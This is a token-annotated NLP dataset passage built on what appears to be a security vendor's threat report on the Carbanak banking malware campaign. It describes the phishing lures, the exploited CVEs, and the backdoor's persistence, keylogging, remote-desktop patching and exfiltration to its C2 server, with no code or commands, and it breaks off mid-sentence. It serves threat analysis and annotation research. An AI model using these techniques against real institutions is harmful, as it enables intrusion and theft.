From IN O O
late JJ O O
2013 CD O O
onwards RB O O
, , O O
several JJ O O
banks NNS O O
and CC O O
financial JJ O O
institutions NNS O O
have VBP O O
been VBN O O
attacked VBN O O
by IN O O
an DT O O
unknown JJ O O
group NN O O
of IN O O
cybercriminals NNS O O
. . O O

In IN O O
all PDT O O
these DT O O
attacks NNS O O
, , O O
a DT O O
similar JJ O O
modus NN O O
operandi NN O O
was VBD O O
used VBN O O
. . O O

According VBG O O
to IN O O
victims NNS O O
and CC O O
the DT O O
law NN O O
enforcement NN O O
agencies NNS O O
( -LRB- O O
LEAs NNP O O
) -RRB- O O
involved VBN O O
in IN O O
the DT O O
investigation NN O O
, , O O
this DT O O
could MD O O
result VB O O
in IN O O
cumulative JJ O O
losses NNS O O
of IN O O
up IN O O
to TO O O
1 CD O O
billion CD O O
USD NN O O
. . O O

The DT O O
attacks NNS O O
are VBP O O
still RB O O
active JJ O O
. . O O

This DT O O
report NN O O
provides VBZ O O
a DT O O
technical JJ O O
analysis NN O O
of IN O O
these DT O O
attacks NNS O O
. . O O

The DT O O
motivation NN O O
for IN O O
the DT O O
attackers NNS O O
, , O O
who WP O O
are VBP O O
making VBG O O
use NN O O
of IN O O
techniques NNS O O
commonly RB O O
seen VBN O O
in IN O O
Advanced NNP O O
Persistent NNP O O
Threats NNS O O
( -LRB- O O
APTs NNP O O
) -RRB- O O
, , O O
appears VBZ O O
to TO O O
be VB O O
financial JJ O O
gain NN O O
as IN O O
opposed VBN O O
to IN O O
espionage NN O O
. . O O

An DT O O
analysis NN O O
of IN O O
the DT O O
campaign NN O O
has VBZ O O
revealed VBN O O
that IN O O
the DT O O
initial JJ O O
infections NNS O O
were VBD O O
achieved VBN O O
using VBG O O
spear NN O O
phishing NN O O
emails NNS O O
that WDT O O
appeared VBD O O
to TO O O
be VB O O
legitimate JJ O O
banking NN O O
communications NNS O O
, , O O
with IN O O
Microsoft NNP O O
Word NNP O O
97 CD O O
– SYM O O
2003 CD O O
( -LRB- O O
.doc NN O O
) -RRB- O O
and CC O O
Control NNP O O
Panel NNP O O
Applet NNP O O
( -LRB- O O
.CPL NNP O O
) -RRB- O O
files VBZ O O
attached VBN O O
. . O O

We PRP O O
believe VBP O O
that IN O O
the DT O O
attackers NNS O O
also RB O O
redirected VBD O O
to TO O O
exploit VB O O
kits NNS O O
website NN O O
traffic NN O O
that WDT O O
related JJ O O
to IN O O
financial JJ O O
activity NN O O
. . O O

The DT O O
email NN O O
attachments VBZ O O
exploit VB O O
vulnerabilities NNS O O
in IN O O
Microsoft NNP O O
Office NNP O O
2003 CD O O
, , O O
2007 CD O O
and CC O O
2010 CD O O
( -LRB- O O
CVE-2012 NN O O
- HYPH O O
0158 CD O O
and CC O O
CVE-2013 NNP O O
- HYPH O O
3906 CD O O
) -RRB- O O
and CC O O
Microsoft NNP O O
Word NNP O O
( -LRB- O O
CVE-2014- NNP O O
1761 CD O O
) -RRB- O O
. . O O

Once IN O O
the DT O O
vulnerability NN O O
is VBZ O O
successfully RB O O
exploited VBN O O
, , O O
the DT O O
shellcode NN O O
decrypts NNS O O
and CC O O
executes VBZ O O
the DT O O
backdoor JJ O O
known VBN O O
as IN O O
Carbanak NNP O O
. . O O

Carbanak NNP B-Entity 1
is VBZ O O
a DT O O
remote JJ O O
backdoor JJ O O
( -LRB- O O
initially RB O O
based VBN O O
on IN O O
Carberp NNP O O
) -RRB- O O
, , O O
designed VBD B-Action 2
for IN B-Modifier 3
espionage NN B-Entity 4
, , O O
data NNS B-Entity 5
exfiltration NN I-Entity O
and CC O O
to IN B-Modifier 6
provide VB O O
remote JJ B-Entity 7
access NN I-Entity O
to IN I-Entity O
infected VBN I-Entity O
machines NNS I-Entity O
. . O O

Once RB O O
access NN O O
is VBZ O O
achieved VBN O O
, , O O
attackers NNS O O
perform VBP O O
a DT O O
manual JJ O O
reconnaissance NN O O
of IN O O
the DT O O
victim NN O O
's POS O O
networks NNS O O
. . O O

Based VBN O O
on IN O O
the DT O O
results NNS O O
of IN O O
this DT O O
operation NN O O
, , O O
the DT O O
attackers NNS O O
use VBP O O
different JJ O O
lateral JJ O O
movement NN O O
tools NNS O O
in IN O O
order NN O O
to TO O O
get VB O O
access NN O O
to IN O O
the DT O O
critical JJ O O
systems NNS O O
in IN O O
the DT O O
victim NN O O
s POS O O
infrastructure NN O O
. . O O

They PRP B-Entity 1
then RB O O
install VB B-Action 2
additional JJ O O
software NN B-Entity 3
such JJ I-Entity O
as IN I-Entity O
the DT I-Entity O
Ammyy NNP I-Entity O
Remote NNP I-Entity O
Administration NNP I-Entity O
Tool NNP I-Entity O
, , O O
or CC O O
even RB O O
compromise NN B-Action 4
SSH NNP O O
servers NNS B-Entity 5
. . O O

Notably RB O O
, , O O
some DT O O
of IN O O
the DT O O
latest JJS O O
versions NNS O O
of IN O O
the DT O O
analyzed VBN O O
Carbanak NNP O O
malware NN O O
appear VBP O O
not RB O O
to TO O O
use VB O O
any DT O O
Carberp JJ O O
source NN O O
code NN O O
. . O O

Once IN O O
the DT O O
attackers NNS O O
successfully RB O O
compromise VB O O
the DT O O
victim NN O O
s POS O O
network NN O O
, , O O
the DT O O
primary JJ O O
internal JJ O O
destinations NNS O O
are VBP O O
money NN O O
processing NN O O
services NNS O O
, , O O
Automated NNP O O
Teller NNP O O
Machines NNPS O O
( -LRB- O O
ATM NNP O O
) -RRB- O O
and CC O O
financial JJ O O
accounts NNS O O
. . O O

In IN O O
some DT O O
cases NNS O O
, , O O
the DT O O
attackers NNS O O
used VBD O O
the DT O O
Society NNP O O
for IN O O
Worldwide NNP O O
Interbank NNP O O
Financial NNP O O
Telecommunication NN O O
( -LRB- O O
SWIFT NNP O O
) -RRB- O O
network NN O O
to TO O O
transfer VB O O
money NN O O
to IN O O
their PRP$ O O
accounts NNS O O
. . O O

In IN O O
others NNS O O
, , O O
Oracle NNP O O
databases NNS O O
were VBD O O
manipulated VBN O O
to TO O O
open VB O O
payment NN O O
or CC O O
debit NN O O
card NN O O
accounts VBZ O O
at IN O O
the DT O O
same JJ O O
bank NN O O
or CC O O
to TO O O
transfer VB O O
money NN O O
between IN O O
accounts NNS O O
using VBG O O
the DT O O
online JJ O O
banking NN O O
system NN O O
. . O O

The DT O O
ATM NNP O O
network NN O O
was VBD O O
also RB O O
used VBN O O
to TO O O
dispense VB O O
cash NN O O
from IN O O
certain JJ O O
ATMs NNS O O
at IN O O
certain JJ O O
times NNS O O
where WRB O O
money NN O O
mules NNS O O
were VBD O O
ready JJ O O
to TO O O
collect VB O O
it PRP O O
. . O O

As IN O O
part NN O O
of IN O O
the DT O O
attack NN O O
s POS O O
reconnaissance NN O O
phase NN O O
, , O O
video NN B-Entity 1
recordings NNS I-Entity O
of IN I-Entity O
the DT I-Entity O
activities NNS I-Entity O
of IN I-Entity O
bank NN I-Entity O
employees NNS I-Entity O
, , O O
particularly RB O O
system NN O O
administrators NNS O O
, , O O
were VBD O O
made VBD B-Action 2
. . O O

The DT O O
videos NNS B-Entity 1
were VBD O O
sent VBN B-Action 2
to IN B-Modifier 3
the DT O O
C2 NNP B-Entity 4
server NN I-Entity O
. . O O

Please UH O O
note VB O O
that IN O O
the DT O O
attackers NNS O O
abused VBD O O
the DT O O
aforementioned JJ O O
services NNS O O
by IN O O
impersonating VBG O O
legitimate JJ O O
local JJ O O
users NNS O O
who WP O O
had VBD O O
the DT O O
permissions NNS O O
to TO O O
perform VB O O
the DT O O
actions NNS O O
later RB O O
reproduced VBN O O
by IN O O
the DT O O
cybercriminals NNS O O
. . O O

As RB O O
far RB O O
as IN O O
we PRP O O
know VBP O O
, , O O
none NN O O
of IN O O
the DT O O
aforementioned JJ O O
services NNS O O
were VBD O O
attacked VBN O O
nor CC O O
was VBD O O
any DT O O
specific JJ O O
vulnerability NN O O
within IN O O
them PRP O O
exploited VBD O O
. . O O

Of IN O O
the DT O O
100 CD O O
banking NN O O
entities NNS O O
impacted VBN O O
at IN O O
the DT O O
time NN O O
of IN O O
writing VBG O O
this DT O O
report NN O O
, , O O
at RB O O
least JJS O O
half NN O O
have VBP O O
suffered VBN O O
financial JJ O O
losses NNS O O
, , O O
with IN O O
most JJS O O
of IN O O
the DT O O
victims NNS O O
located VBN O O
in IN O O
Russia NNP O O
, , O O
USA NNP O O
, , O O
Germany NNP O O
, , O O
China NNP O O
and CC O O
Ukraine NNP O O
. . O O

The DT O O
magnitude NN O O
of IN O O
the DT O O
losses NNS O O
is VBZ O O
significant JJ O O
. . O O

For IN O O
example NN O O
, , O O
one CD O O
victim NN O O
lost VBD O O
approximately RB O O
$ $ O O
7.3 CD O O
million CD O O
( -LRB- O O
USD NN O O
) -RRB- O O
due JJ O O
to IN O O
ATM NNP O O
fraud NN O O
; : O O
another DT O O
suffered VBD O O
a DT O O
$ $ O O
10 CD O O
million CD O O
( -LRB- O O
USD NN O O
) -RRB- O O
loss NN O O
due IN O O
to IN O O
the DT O O
exploitation NN O O
of IN O O
its PRP$ O O
online JJ O O
banking NN O O
platform NN O O
. . O O

Stolen VBN O O
funds NNS O O
were VBD O O
transferred VBN O O
out IN O O
of IN O O
the DT O O
affected JJ O O
countries NNS O O
to IN O O
bank NN O O
accounts NNS O O
in IN O O
the DT O O
US NNP O O
and CC O O
China NNP O O
. . O O

Additionally RB O O
some DT O O
of IN O O
the DT O O
C2 NNP O O
servers NNS O O
have VBP O O
log NN O O
entries NNS O O
indicating VBG O O
connections NNS O O
to IN O O
systems NNS O O
located VBN O O
in IN O O
the DT O O
US NNP O O
. . O O

Telemetry NN O O
indicates VBZ O O
that IN O O
the DT O O
attackers NNS O O
are VBP O O
expanding VBG O O
operations NNS O O
to IN O O
other JJ O O
regions NNS O O
, , O O
such JJ O O
as IN O O
Asia NNP O O
, , O O
the DT O O
Middle NNP O O
- HYPH O O
East NNP O O
, , O O
Africa NNP O O
and CC O O
Europe NNP O O
. . O O

This DT O O
report NN O O
discusses VBZ O O
the DT O O
attack NN O O
vectors NNS O O
, , O O
infection NN O O
mechanisms NNS O O
and CC O O
toolkits NNS O O
used VBN O O
by IN O O
the DT O O
attackers NNS O O
to TO O O
exploit VB O O
the DT O O
network NN O O
after IN O O
the DT O O
initial JJ O O
infection NN O O
, , O O
as RB O O
well RB O O
as IN O O
the DT O O
operational JJ O O
details NNS O O
and CC O O
geographical JJ O O
distribution NN O O
of IN O O
this DT O O
campaign NN O O
. . O O

During IN O O
the DT O O
spring NN O O
of IN O O
2014 CD O O
, , O O
Kaspersky NNP O O
Lab NNP O O
was VBD O O
involved VBN O O
in IN O O
a DT O O
forensic JJ O O
analysis NN O O
of IN O O
ATMs NNS O O
dispensing VBG O O
cash NN O O
to IN O O
people NNS O O
located VBN O O
near IN O O
them PRP O O
but CC O O
with IN O O
no DT O O
physical JJ O O
interaction NN O O
according VBG O O
to IN O O
security NN O O
cameras NNS O O
. . O O

No DT O O
malware NN O O
was VBD O O
detected VBN O O
on IN O O
these DT O O
ATMs NNS O O
. . O O

However RB O O
, , O O
Carberp NNP O O
- HYPH O O
like JJ O O
malware NN O O
was VBD O O
found VBN O O
on IN O O
a DT O O
computer NN O O
that WDT O O
was VBD O O
connected VBN O O
to IN O O
them PRP O O
via IN O O
VPN NNP O O
. . O O

Following VBG O O
the DT O O
investigation NN O O
of IN O O
this DT O O
incident NN O O
, , O O
in IN O O
the DT O O
summer NN O O
of IN O O
2014 CD O O
, , O O
Kaspersky NNP O O
Lab NNP O O
identified VBD O O
the DT O O
same JJ O O
Carberp NNP O O
- HYPH O O
like JJ O O
malware NN O O
in IN O O
another DT O O
investigation NN O O
involving VBG O O
a DT O O
bank NN O O
, , O O
where WRB O O
criminals NNS O O
were VBD O O
able JJ O O
to TO O O
gain VB O O
access NN O O
to IN O O
its PRP$ O O
online JJ O O
banking NN O O
systems NNS O O
. . O O

In IN O O
this DT O O
investigation NN O O
, , O O
we PRP O O
started VBD O O
analyzing VBG O O
all PDT O O
the DT O O
computers NNS O O
in IN O O
the DT O O
bank NN O O
's POS O O
infrastructure NN O O
in IN O O
order NN O O
to TO O O
find VB O O
the DT O O
source NN O O
of IN O O
the DT O O
infection NN O O
. . O O

We PRP O O
found VBD O O
spear NN O O
phishing VBG O O
emails NNS O O
with IN O O
CPL NNP O O
files NNS O O
attached VBN O O
that IN O O
, , O O
after IN O O
a DT O O
successful JJ O O
infection NN O O
, , O O
install VB O O
the DT O O
same JJ O O
Carberp NNP O O
- HYPH O O
like JJ O O
malware NN O O
we PRP O O
had VBD O O
previously RB O O
found VBN O O
in IN O O
the DT O O
case NN O O
involving VBG O O
the DT O O
ATMs NNS O O
. . O O

There EX O O
is VBZ O O
evidence NN O O
indicating VBG O O
that IN O O
in IN O O
most JJS O O
cases NNS O O
the DT O O
network NN O O
was VBD O O
compromised VBN O O
for IN O O
between IN O O
two CD O O
to TO O O
four CD O O
months NNS O O
, , O O
and CC O O
that IN O O
many JJ O O
hundreds NNS O O
of IN O O
computers NNS O O
within IN O O
a DT O O
single JJ O O
victim NN O O
organization NN O O
may MD O O
have VB O O
been VBN O O
infected VBN O O
. . O O

This DT O O
period NN O O
of IN O O
time NN O O
was VBD O O
used VBN O O
by IN O O
the DT O O
attackers NNS O O
to TO O O
get VB O O
access NN O O
to IN O O
the DT O O
right JJ O O
victims NNS O O
and CC O O
critical JJ O O
systems NNS O O
, , O O
and CC O O
to TO O O
learn VB O O
how WRB O O
to TO O O
operate VB O O
their PRP$ O O
tools NNS O O
and CC O O
systems NNS O O
to TO O O
get VB O O
the DT O O
cash NN O O
out RP O O
. . O O

Carbanak NNP O O
contains VBZ O O
an DT O O
espionage NN O O
component NN O O
that WDT O O
allows VBZ O O
the DT O O
attackers NNS O O
to TO O O
take VB O O
control NN O O
of IN O O
video NN O O
capabilities NNS O O
on IN O O
the DT O O
victim NN O O
systems NNS O O
. . O O

Thanks NNS O O
to IN O O
this DT O O
, , O O
long JJ O O
term NN O O
observation NN O O
and CC O O
reconnaissance NN O O
could MD O O
be VB O O
conducted VBN O O
. . O O

This DT O O
allowed VBD O O
the DT O O
attackers NNS O O
to TO O O
understand VB O O
the DT O O
protocols NNS O O
and CC O O
daily JJ O O
operational JJ O O
tempo NN O O
of IN O O
their PRP$ O O
targets NNS O O
. . O O

Based VBN O O
on IN O O
this DT O O
understanding NN O O
, , O O
exploitation NN O O
methodologies NNS O O
and CC O O
mechanisms NNS O O
were VBD O O
developed VBN O O
and CC O O
tailored VBN O O
to IN O O
each DT O O
victim NN O O
. . O O

All DT O O
observed VBD O O
cases NNS O O
used VBN O O
spear NN O O
phishing NN O O
emails NNS O O
with IN O O
Microsoft NNP O O
Word NNP O O
97 CD O O
– SYM O O
2003 CD O O
( -LRB- O O
.doc NN O O
) -RRB- O O
files NNS O O
attached VBN O O
or CC O O
CPL NNP O O
files NNS O O
. . O O

The DT O O
doc NN O O
files NNS O O
exploit VBP O O
both DT O O
Microsoft NNP O O
Office NNP O O
( -LRB- O O
CVE- NNP O O
2012 CD O O
- SYM O O
0158 CD O O
and CC O O
CVE-2013 NNP O O
- HYPH O O
3906 CD O O
) -RRB- O O
and CC O O
Microsoft NNP O O
Word NNP O O
( -LRB- O O
CVE- NNP O O
2014 CD O O
- SYM O O
1761 CD O O
) -RRB- O O
. . O O

There EX O O
are VBP O O
indicators NNS O O
that WDT O O
point VBP O O
to IN O O
a DT O O
possible JJ O O
Chinese JJ O O
origin NN O O
for IN O O
the DT O O
exploits NNS O O
used VBN O O
in IN O O
these DT O O
attachments NNS O O
. . O O

Command NNP O O
and CC O O
Control NNP O O
( -LRB- O O
C2 NNP O O
) -RRB- O O
servers NNS O O
located VBN O O
in IN O O
China NNP O O
have VBP O O
been VBN O O
identified VBN O O
in IN O O
this DT O O
campaign NN O O
. . O O

In IN O O
addition NN O O
, , O O
registration NN O O
information NN O O
for IN O O
some DT O O
of IN O O
the DT O O
domains NNS O O
use VBP O O
details NNS O O
of IN O O
supposedly RB O O
Chinese JJ O O
citizens NNS O O
. . O O

Obviously RB O O
, , O O
all PDT O O
this DT O O
could MD O O
just RB O O
be VB O O
a DT O O
red JJ O O
herring NN O O
. . O O

6 CD O O
The DT O O
targets NNS O O
were VBD O O
all DT O O
employees NNS O O
affiliated VBN O O
to IN O O
the DT O O
affected JJ O O
institution NN O O
. . O O

The DT O O
spear NN O O
phishing VBG O O
email NN O O
messages NNS O O
appeared VBD O O
legitimate JJ O O
and CC O O
in IN O O
some DT O O
cases NNS O O
were VBD O O
sent VBN O O
from IN O O
compromised JJ O O
coworkers NNS O O
accounts NNS O O
. . O O

In IN O O
this DT O O
way NN O O
compromised VBN O O
systems NNS O O
were VBD O O
used VBN O O
as IN O O
a DT O O
transmission NN O O
vector NN O O
. . O O

Given VBN O O
that IN O O
the DT O O
victims NNS O O
were VBD O O
mostly RB O O
Russian JJ O O
- HYPH O O
speaking VBG O O
financial JJ O O
institutions NNS O O
, , O O
the DT O O
names NNS O O
of IN O O
the DT O O
attachments NNS O O
we PRP O O
have VBP O O
identified VBN O O
were VBD O O
generally RB O O
in IN O O
Russian JJ O O
. . O O

Examples NNS O O
include VBP O O
" `` O O
Соответствие NNP O O
ФЗ-115 NNP O O
" '' O O
and CC O O
" `` O O
Приглашение NNP O O
" '' O O
which WDT O O
translate VBP O O
into IN O O
" `` O O
Accordance NN O O
to IN O O
Federal NNP O O
Law NNP O O
" '' O O
and CC O O
" `` O O
Invitation NNP O O
" '' O O
respectively RB O O
. . O O

This DT O O
is VBZ O O
enough JJ O O
to TO O O
induce VB O O
a DT O O
typical JJ O O
employee NN O O
to TO O O
open VB O O
the DT O O
attachment NN O O
and CC O O
execute VB O O
the DT O O
malware NN O O
. . O O

For IN O O
a DT O O
complete JJ O O
list NN O O
of IN O O
file NN O O
names NNS O O
see VBP O O
Appendix NNP O O
4 CD O O
. . O O

The DT O O
following VBG O O
is VBZ O O
an DT O O
example NN O O
of IN O O
a DT O O
Carbanak NNP O O
spear NN O O
phishing VBG O O
email NN O O
. . O O

Translated VBN O O
. . O O

In IN O O
this DT O O
case NN O O
, , O O
the DT O O
attachment NN O O
was VBD O O
a DT O O
CPL NNP O O
file NN O O
compressed VBN O O
using VBG O O
the DT O O
Roshal NNP O O
Archive NNP O O
( -LRB- O O
.rar NNP O O
) -RRB- O O
format NN O O
. . O O

Once IN O O
the DT O O
remote JJ O O
code NN O O
execution NN O O
vulnerability NN O O
is VBZ O O
successfully RB O O
exploited VBN O O
, , O O
it PRP O O
installs VBZ O O
Carbanak NNP O O
on IN O O
the DT O O
victim NN O O
's POS O O
system NN O O
. . O O

The DT O O
complete JJ O O
list NN O O
of IN O O
observed JJ O O
spear NN O O
phishing VBG O O
emails NNS O O
can MD O O
be VB O O
found VBN O O
in IN O O
Appendix NNP O O
1 CD O O
– CD O O
Spear NNP O O
phishing NN O O
. . O O

An DT O O
additional JJ O O
infection NN O O
vector NN O O
that WDT O O
we PRP O O
believe VBP O O
was VBD O O
used VBN O O
by IN O O
the DT O O
criminals NNS O O
is VBZ O O
a DT O O
classical JJ O O
drive NN O O
- HYPH O O
by IN O O
- HYPH O O
download NN O O
attack NN O O
. . O O

We PRP O O
have VBP O O
found VBN O O
traces NNS O O
of IN O O
the DT O O
Null NNP O O
and CC O O
the DT O O
RedKit NN O O
exploits VBZ O O
kits NNS O O
. . O O

The DT O O
image NN O O
above RB O O
translates VBZ O O
as IN O O
Country_name NNP O O
, , O O
All DT O O
visitors NNS O O
, , O O
Unique NNP O O
visitors NNS O O
, , O O
Banned VBN O O
visitor NN O O
, , O O
Revoked NNP O O
infections NNS O O
, , O O
Infected NNP O O
. . O O

Carbanak NNP O O
is VBZ O O
a DT O O
backdoor NN O O
used VBN O O
by IN O O
the DT O O
attackers NNS O O
to TO O O
compromise VB O O
the DT O O
victim NN O O
's POS O O
machine NN O O
once IN O O
the DT O O
exploit NN O O
, , O O
either CC O O
in IN O O
the DT O O
spear NN O O
phishing VBG O O
email NN O O
or CC O O
exploit VB O O
kit NN O O
, , O O
successfully RB O O
executes VBZ O O
its PRP$ O O
payload NN O O
. . O O

This DT O O
section NN O O
provides VBZ O O
a DT O O
functional JJ O O
analysis NN O O
of IN O O
Carbanak NNP O O
's POS O O
capabilities NNS O O
. . O O

Carbanak NNP B-Entity 1
copies NNS B-Action 2
itself PRP B-Entity 3
into IN B-Modifier 4
" '' O O
% NN B-Entity 5
system32%\com NN I-Entity O
" '' I-Entity O
with IN O O
the DT O O
name NN O O
" `` O O
svchost.exe NN O O
" '' O O
with IN O O
the DT O O
file NN O O
attributes VBZ O O
: : O O
system NN O O
, , O O
hidden VBN O O
and CC O O
read VBN O O
- HYPH O O
only RB O O
. . O O

The DT O O
original JJ O O
file NN O O
created VBN O O
by IN O O
the DT O O
exploit NN O O
payload NN O O
is VBZ O O
then RB O O
deleted VBN O O
. . O O

To TO O O
ensure VB O O
that IN O O
Carbanak NNP O O
has VBZ O O
autorun JJ O O
privileges NNS O O
the DT B-Entity 1
malware NN I-Entity O
creates VBZ B-Action 2
a DT O O
new JJ B-Entity 3
service NN I-Entity O
. . O O

The DT O O
naming NN O O
syntax NN O O
is VBZ O O
" `` O O
< XX O O
ServiceName NNP O O
> XX O O
Sys VBD O O
" `` O O
where WRB O O
ServiceName NNP O O
is VBZ O O
any DT O O
existing VBG O O
service NN O O
randomly RB O O
chosen VBN O O
, , O O
with IN O O
the DT O O
first JJ O O
character NN O O
deleted VBN O O
. . O O

For IN O O
example NN O O
, , O O
if IN O O
the DT O O
existing VBG O O
service NN O O
s POS O O
name NN O O
is VBZ O O
" `` O O
aspnet NN O O
" '' O O
and CC O O
the DT O O
visible JJ O O
name NN O O
is VBZ O O
" `` O O
Asp.net JJ O O
state NN O O
service NN O O
" '' O O
, , O O
the DT O O
service NN O O
created VBN O O
by IN O O
the DT O O
malware NN O O
would MD O O
be VB O O
" `` O O
aspnetSys NNP O O
" '' O O
with IN O O
a DT O O
visible JJ O O
name NN O O
of IN O O
" `` O O
Sp.net JJ O O
state NN O O
service NN O O
" '' O O
. . O O

Before IN O O
creating VBG O O
the DT O O
malicious JJ O O
service NN O O
, , O O
Carbanak NNP B-Entity 1
determines VBZ B-Action 2
if IN B-Modifier 3
either CC O O
the DT B-Entity 4
avp.exe NN I-Entity O
or CC I-Entity O
avpui.exe NN I-Entity O
processes NNS I-Entity O
( -LRB- I-Entity O
components NNS I-Entity O
of IN I-Entity O
Kaspersky NNP I-Entity O
Internet NNP I-Entity O
Security NNP I-Entity O
) -RRB- I-Entity O
is VBZ I-Entity O
running VBG I-Entity O
. . O O

If IN O O
found VBN O O
on IN O O
the DT O O
target NN O O
system NN O O
, , O O
Carbanak NNP O O
will MD O O
try VB O O
to TO O O
exploit VB O O
a DT O O
known VBN O O
vulnerability NN O O
in IN O O
Windows NNP O O
XP NNP O O
, , O O
Windows NNP O O
Server NNP O O
2003 CD O O
, , O O
Windows NNP O O
Vista NNP O O
, , O O
Windows NNP O O
Server NNP O O
2008 CD O O
, , O O
Windows NNP O O
7 CD O O
, , O O
Windows NNP O O
8 CD O O
, , O O
and CC O O
Windows NNP O O
Server NNP O O
2012 CD O O
, , O O
CVE-2013 NNP O O
- HYPH O O
3660 CD O O
, , O O
for IN O O
local JJ O O
privilege NN O O
escalation NN O O
. . O O

We PRP O O
believe VBP O O
this DT O O
is VBZ O O
not RB O O
relevant JJ O O
and CC O O
that IN O O
the DT O O
attackers NNS O O
adapt VBP O O
their PRP$ O O
tools NNS O O
to IN O O
the DT O O
victim NN O O
s POS O O
defenses NNS O O
. . O O

Carbanak NNP B-Entity 1
creates VBZ B-Action 2
a DT O O
file NN B-Entity 3
with IN I-Entity O
a DT I-Entity O
random JJ I-Entity O
name NN I-Entity O
and CC I-Entity O
a DT I-Entity O
.bin NNP I-Entity O
extension NN I-Entity O
in IN B-Modifier 4
% NN O O
COMMON_APPDATA%\Mozilla NNP B-Entity 5
where WRB O O
it PRP O O
stores VBZ O O
commands NNS O O
to TO O O
be VB O O
executed VBN O O
. . O O

Then RB O O
the DT B-Entity 1
malware NN I-Entity O
gets VBZ B-Action 2
the DT O O
proxy NN B-Entity 3
configuration NN I-Entity O
from IN B-Modifier 4
the DT O O
registry NN B-Entity 5
entry NN I-Entity O
: : O O
[ -LRB- O O
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet NNP O O
Settings NNP O O
] -RRB- O O
and CC O O
the DT O O
Mozilla NNP O O
Firefox NNP O O
configuration NN O O
file NN O O
in IN O O
: : O O
% NN O O
AppData%\Mozilla\Firefox\<ProfileName>\prefs.js DT O O
How WRB O O
to TO O O
detect VB O O
Carbanak NNP O O
One CD O O
of IN O O
the DT O O
best JJS O O
methods NNS O O
for IN O O
detecting VBG O O
Carbanak NNP O O
is VBZ O O
to TO O O
look VB O O
for IN O O
.bin JJ O O
files NNS O O
in IN O O
the DT O O
folder NN O O
: : O O
.. . O O
\All LS O O
users\%AppData%\Mozilla\ IN O O
The DT B-Entity 6
malware NN I-Entity O
saves VBZ B-Action 7
files VBZ B-Entity 8
in IN B-Modifier 9
this DT O O
location NN B-Entity 10
that WDT O O
will MD O O
later RB O O
be VB O O
sent VBN B-Action 11
to IN B-Modifier 12
the DT O O
C2 NNP B-Entity 13
server NN I-Entity O
when WRB O O
an DT O O
internet NN O O
connection NN O O
is VBZ O O
detected VBN O O
. . O O

A DT O O
.BAT NN O O
script NN O O
for IN O O
detecting VBG O O
infections NNS O O
is VBZ O O
provided VBN O O
in IN O O
the DT O O
Appendixes NNP O O
. . O O

Additionally RB O O
, , O O
Carbanak NNP B-Entity 1
can MD O O
obtain VB B-Action 2
proxy NN O O
configuration NN B-Entity 3
information NN I-Entity O
from IN B-Modifier 4
headers NNS O O
sent VBD B-Entity 5
through IN I-Entity O
an DT I-Entity O
application NN I-Entity O
via IN I-Entity O
SOCKS NN I-Entity O
or CC I-Entity O
HTTP NNP I-Entity O
. . O O

Carbanak NNP B-Entity 1
injects VBZ B-Action 2
its PRP$ O O
code NN B-Entity 3
into IN B-Modifier 4
svchost.exe NNP B-Entity 5
. . O O

Most JJS O O
of IN O O
the DT O O
actions NNS O O
described VBD O O
below IN O O
happen VB O O
within IN O O
this DT O O
process NN O O
. . O O

Carbanak NNP B-Entity 1
downloads VBZ B-Action 2
the DT O O
file NN B-Entity 3
kldconfig.plug NN I-Entity O
from IN B-Modifier 4
its PRP$ O O
C2 NNP B-Entity 5
server NN I-Entity O
. . O O

This DT O O
file NN O O
includes VBZ O O
the DT O O
names NNS O O
of IN O O
the DT O O
processes NNS O O
to TO O O
be VB O O
monitored VBN O O
. . O O

Once IN O O
the DT O O
system NN O O
is VBZ O O
infected VBN O O
, , O O
Carbanak NNP B-Entity 1
logs VBZ B-Action 2
keystrokes VBZ B-Entity 3
and CC O O
takes VBZ B-Action 4
screenshots NNS B-Entity 5
every DT B-Modifier 6
20 CD O O
seconds NNS B-Entity 7
. . O O

This DT O O
monitoring NN O O
is VBZ O O
performed VBN O O
by IN O O
intercepting VBG O O
the DT O O
ResumeThread NNP O O
call NN O O
. . O O

To TO O O
enable VB B-Action 1
connections NNS O O
to IN B-Entity 2
the DT I-Entity O
infected JJ I-Entity O
computer NN I-Entity O
using VBG I-Entity O
the DT I-Entity O
Remote NNP I-Entity O
Desktop NNP I-Entity O
Protocol NNP I-Entity O
( -LRB- I-Entity O
RDP NNP I-Entity O
) -RRB- I-Entity O
, , O O
Carbanak NNP B-Entity 3
sets VBZ B-Action 4
Termservice NNP O O
service NN B-Entity 5
execution NN I-Entity O
mode NN I-Entity O
to IN B-Modifier 6
Auto NNP B-Entity 7
. . O O

Also RB O O
, , O O
after IN O O
executing VBG O O
this DT O O
service NN O O
, , O O
it PRP O O
modifies VBZ O O
the DT O O
executable JJ O O
code NN O O
in IN O O
memory NN O O
in IN O O
order NN O O
to TO O O
establish VB O O
simultaneous JJ O O
work NN O O
processes NNS O O
for IN O O
both CC O O
remote JJ O O
and CC O O
local JJ O O
users NNS O O
. . O O

Modules NNS O O
modified VBN O O
in IN O O
this DT O O
process NN O O
are VBP O O
: : O O
termsrv.dll NNS O O
, , O O
csrsrv.dll NN O O
, , O O
msgina.dll NN O O
and CC O O
winlogon.exe NN O O
. . O O

If IN O O
Carbanak NNP B-Entity 1
detects VBZ B-Action 2
the DT O O
banking NN B-Entity 3
application NN I-Entity O
BLIZKO NNP I-Entity O
( -LRB- I-Entity O
funds NNS I-Entity O
transfer NN I-Entity O
software NN I-Entity O
) -RRB- I-Entity O
in IN B-Modifier 4
the DT O O
infected VBN B-Entity 5
computer NN I-Entity O
, , O O
it PRP B-Entity 6
sends VBZ B-Action 7
a DT O O
special JJ B-Entity 8
notification NN I-Entity O
to IN B-Modifier 9
its PRP$ O O
C2 NNP B-Entity 10
server NN I-Entity O
. . O O

Carbanak NNP O O
is VBZ O O
also RB O O
aware JJ O O
of IN O O
the DT O O
IFOBS NNP O O
banking NN O O
application NN O O
and CC O O
can MD O O
, , O O
on IN O O
command NN O O
, , O O
substitute VB O O
the DT O O
details NNS O O
of IN O O
payment NN O O
documents NNS O O
in IN O O
the DT O O
IFOBS NNP O O
system NN O O
. . O O

To TO O O
communicate VB O O
with IN O O
its PRP$ O O
C2 NNP O O
server NN O O
, , O O
Carbanak NNP O O
uses VBZ O O
the DT O O
HTTP NNP O O
protocol NN O O
with IN O O
RC2+Base64 NNP O O
encryption NN O O
, , O O
adding VBG O O
additional JJ O O
characters NNS O O
not RB O O
included VBN O O
in IN O O
Base64 NNP O O
. . O O

It PRP O O
also RB O O
inserts VBZ O O
strings NNS O O
with IN O O
different JJ O O
extensions NNS O O
( -LRB- O O
.gif,.htm NNP O O
, , O O
etc FW O O
. . O O
) -RRB- O O
at IN O O
random JJ O O
